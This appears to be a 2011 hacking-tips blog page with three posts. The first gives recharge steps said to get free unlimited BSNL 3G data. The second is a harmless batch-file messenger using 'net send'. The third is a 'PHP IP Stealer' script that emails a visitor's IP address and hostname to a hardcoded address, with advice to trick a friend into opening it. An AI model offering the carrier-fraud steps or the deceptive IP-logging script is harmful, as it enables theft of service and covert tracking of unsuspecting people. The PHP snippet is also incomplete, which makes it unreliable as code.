Thursday, July 28, 2011

BSNL 3G Hack! Browse Internet For Free

Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.


Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

Just follow up the instruction:
  1. Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
  2. Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
  3. Now recharge again with Rs 1 to convert in to 2G SIM
  4. Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM 
  5. Now again recharge with Rs 1 to convert in to 3G SIM 
  6. Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.

Monday, July 18, 2011

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: xx.xxx.xxx.xxx
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Friday, July 15, 2011

PHP IP Stealer

$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "dushpandya2001@hotmail.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>

Replace dushpandya2001@hotmail.com with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbox..

Twitter Delicious Facebook Digg Stumbleupon Favorites More